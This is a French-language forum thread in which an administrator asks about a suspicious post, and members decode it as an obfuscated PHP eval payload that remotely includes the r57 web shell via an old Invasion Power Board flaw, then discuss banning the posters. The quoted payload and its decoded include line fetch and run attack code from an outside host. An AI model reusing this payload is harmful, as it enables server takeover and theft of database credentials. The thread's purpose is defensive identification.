Citation :eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Dans mon forum, je me suis à deux topics de ça ...
Si quelqu'un sait ce que c'ets qu'il me dise, par ce que je soupçonne une tentative de piratage mais on sait jamais ...
Oui, c'est exactement ça. Si tes pages fonctionnenent normallement, il n'y a pas de problème.
Sinon voilà ce que ça fait : include "http://rst.void.ru/download/r57shell.txt";/*
Ce genre d'attaque (qui n'a rien de professionel et rien d'hyper remarquable car n'importe qui sait le faire) devient relativement fréquent.
Petite recherche et les résultats sont pour le moins intéressants :
source
D'après ce "tutorial", ton utilisateur a usé d'une faille d'Invasion Power Board 2.1.5 qui a été résolue depuis et protégée sur nombre de scripts de forums.
Si j'ai bien suivi, au final des instructions (aujourd'hui dépassées donc et c'est pour cela que l'auteur se permet de les écrire - il le précise en fin de document), l'utilisateur devait être à même d'exécuter un script de sa confection, de se nommer administrateur de ton forum ou d'obtenir des informations sur ses utilisateurs.
En bref : un membre à exclure de toute urgence et une ip à bannir...
Bonne chance
Merci beaucoup
Ca va etre sa fete :nonon:
J'ai exécuté le script chez moi.
Ce script n'a plus au moins aucun rapport avec IPB. Il en use une faille ^^
J'ai vu apparaitre mes identifiants à ma BD, ainsi que d'autres informations fragiles. C'est un script assez puissant et dont il faut se méfier.
Sauf que je pense qu'à l'heure actuelle, si tout le monde sait faire ça, les forums, surtout IPB, ne sont plus vulnérables à ce genre de bétises...
Sur mon forum non mis à jour, on voit rien, donc je sais pas ... mais le type à été banni : un belge (non non, je suis pas anti belge ^^)
La chose que je voulais préciser, c'est que le mec il s'en fout de ton forum. C'est le serveur qui est intéressant
Citation :un belge (non non, je suis pas anti belge 34)
Sert à quoi de le préciser alors ?
iffle: (oui, oui je protège la réputation de mon pays
)
@ Damen :
Citation :D'après ce "tutorial", ton utilisateur a usé d'une faille d'Invasion Power Board 2.1.5 qui a été résolue depuis et protégée sur nombre de scripts de forums.
D'après ce que j'ai compris du lien cité dans le message en question...
Isenduil a écrit :Citation :un belge (non non, je suis pas anti belge 34)
Sert à quoi de le préciser alors ? iffle: (oui, oui je protège la réputation de mon pays )
Je disais ça parce que si j'avais dit "c'est un belge" tout le monde aurait cru que je parlais de généralités, donc on aurait pensé que j'étais anti-belge ^^
Les deux membres ont été bannis, leurs IP aussi
Mais on change bientôt de forum pour un perso, donc ça devrait plus se reproduire
Merci à vous,
Enyrian